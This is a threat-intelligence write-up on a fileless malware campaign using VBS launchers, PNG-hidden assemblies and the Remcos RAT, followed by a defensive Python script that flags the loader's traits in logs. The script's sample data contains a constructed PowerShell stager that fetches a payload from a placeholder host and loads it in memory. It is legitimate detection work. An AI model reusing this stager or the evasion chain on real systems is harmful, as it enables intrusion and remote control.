A new, sophisticated malware campaign is targeting systems using a multi-stage approach involving obfuscated Visual Basic Script (VBS) files, PNG loaders, and remote access trojans (RATs), all designed for stealthy, disk-less execution. This campaign, initially noted in early 2026, has revealed a reusable delivery framework operating from shared infrastructure. The primary characteristic of this Open Directory Malware Campaign is its ability to deploy diverse malware payloads through separate attack chains without leaving traditional traces.
The campaign was first identified through a suspicious VBS file, named Name_File.vbs, detected in a user’s public download directory. While endpoint protection successfully quarantined the file, its heavily encoded content signaled a more organized threat than a simple opportunistic attack. Analysis revealed Base64-encoded PowerShell commands within the script, designed to fetch additional components from remote servers. Subsequent investigation by LevelBlue’s SpiderLabs Cyber Threat Intelligence team confirmed these suspicions, uncovering a distributed attack operation.
Unraveling the Open Directory Malware Campaign’s Infrastructure and Tactics
The investigation into the Open Directory Malware Campaign uncovered a network of attacker-controlled domains, primarily news4me[.]xyz, hosting multiple obfuscated VBS files within openly accessible directories. These included subdirectories like `/coupon/`, `/protector/`, and `/invoice/`, each serving a specific purpose in the attack chain: staging VBS launchers, hosting obfuscated payload files, or facilitating entirely separate infection vectors. This structure allows attackers to quickly update, rotate, or expand their hosted payloads without altering the core delivery logic, making the campaign resilient to detection and disruption.
The threat identified involves a reusable delivery framework capable of pushing different malware payloads. This infrastructure was not a static setup but a dynamic system allowing for rapid adaptation. Beyond the VBS-based attacks, evidence also indicated a separate infection chain linked to a deceptive PDF file, operating from the same infrastructure. This confirms the campaign’s deliberate and multi-vector approach, aiming to capitalize on various entry points.
Inside the Infection Mechanism: VBS to In-Memory RAT Execution
The initial stage of the infection leverages a VBS file that functions solely as a launcher, containing no inherently malicious code. This script is deeply obscured by layers of Unicode characters. Once these characters are stripped, the underlying VBS code is revealed as a Base64-encoded PowerShell command, which serves as the true engine of the attack. This PowerShell command is designed to operate as a fileless loader, enforcing TLS 1.2 protocols and utilizing the Net.WebClient class to retrieve content from remote locations.
Instead of downloading a conventional executable file, the loader fetches a PNG image file named MSI_PRO_with_b64.png. This image file, while appearing innocuous, contains encoded data concealed between specific markers, known as BaseStart and BaseEnd. This embedded assembly, identified as PhantomVAI, is loaded directly into the system’s memory using the Reflection.Assembly::Load method. This “in-memory” execution bypasses traditional file-based security controls, making it significantly harder for standard antivirus solutions to detect.
Once the PhantomVAI assembly is active in memory, it retrieves two URLs for subsequent execution. The first URL, news4me[.]xyz/protector/johnremcos.txt, contains an obfuscated string. Upon decoding, this string reveals a functional instance of the Remcos RAT, a popular remote access trojan. This payload grants the attackers persistent, remote control over the compromised machine, enabling them to exfiltrate data, deploy further malware, or conduct espionage. The second URL delivers a file named uac.png, another PNG image containing a DLL designed for User Account Control (UAC) bypass. This component silently escalates privileges, allowing the attackers to operate with elevated permissions without user interaction.
The combined effect of these payloads is to provide attackers with comprehensive control over a targeted system, all while leaving minimal traditional file artifacts on the disk. This advanced technique highlights the evolving sophistication of modern cyber threats. The campaign’s reliance on fileless malware and memory-resident payloads poses a significant challenge for traditional security measures. The use of domain generation algorithms and the ability to quickly rotate payloads suggest a well-resourced and adaptable adversary.
Organizations are advised to implement strict policies regarding the execution of VBS and BAT files from user-writable directories, such as Users\Public. Additionally, enforcing constrained PowerShell policies with robust in-memory execution logging can provide crucial visibility. On the network level, blocking WebDAV-based connections and filtering traffic to and from `.xyz` top-level domains are recommended measures to obstruct access to the identified attacker infrastructure. Effective endpoint protection must be complemented by in-depth threat intelligence and proactive monitoring to detect and respond to such advanced, multi-vector attacks.
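As an added example (not code from the LevelBlue report), the following Python triage script applies the in-memory execution logging recommendation to the loader described above: it decodes PowerShell -EncodedCommand lines as captured by process-creation or script-block logging, flags the three traits the article names (forcing TLS 1.2, Net.WebClient retrieval, Reflection.Assembly::Load), and pulls the data sitting between the BaseStart and BaseEnd markers out of a fetched image. The sample log lines, the image bytes and the attacker.invalid host are constructed placeholders, and the Base64 encoding between the markers is assumed from the file name MSI_PRO_with_b64.png.

```python
import base64
import re

# Traits of the fileless loader, matched against the decoded script text.
# Case-insensitive because PowerShell is.
LOADER_TRAITS = {
    "tls12": re.compile(r"SecurityProtocol\s*=.*Tls12", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]?::Load", re.I),
}
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the script behind -EncodedCommand (UTF-16LE Base64), else the raw line."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed encoding: fall back to scanning the raw line


def loader_traits(cmdline: str) -> set:
    """Name the traits present; all three together match the in-memory loader pattern."""
    script = decode_encoded_command(cmdline)
    return {name for name, rx in LOADER_TRAITS.items() if rx.search(script)}


def is_fileless_loader(cmdline: str) -> bool:
    return loader_traits(cmdline) == set(LOADER_TRAITS)


def extract_between_markers(blob: bytes, start=b"BaseStart", end=b"BaseEnd"):
    """Triage helper: decode the Base64 between the markers of a fetched image, or None."""
    i = blob.find(start)
    j = blob.find(end, i + len(start)) if i != -1 else -1
    if i == -1 or j == -1:
        return None
    try:
        return base64.b64decode(blob[i + len(start):j].strip(), validate=True)
    except ValueError:
        return None


# Constructed samples (not telemetry from the campaign); host and bytes are placeholders.
_STAGER = ("[Net.ServicePointManager]::SecurityProtocol='Tls12';"
           "$c=New-Object Net.WebClient;"
           "$d=$c.DownloadString('http://attacker.invalid/MSI_PRO_with_b64.png');"
           "[Reflection.Assembly]::Load($bytes)")
SAMPLE_LOGS = [
    "powershell.exe -w hidden -enc " + base64.b64encode(_STAGER.encode("utf-16-le")).decode(),
    "powershell.exe -Command Get-ChildItem C:\\Users\\Public",
]
SAMPLE_PNG = (b"\x89PNG\r\n\x1a\n...BaseStart"
              + base64.b64encode(b"example-assembly-bytes") + b"BaseEnd...")
```

Only a line carrying all three traits is reported as the loader pattern, so an administrator listing a directory does not trip the check.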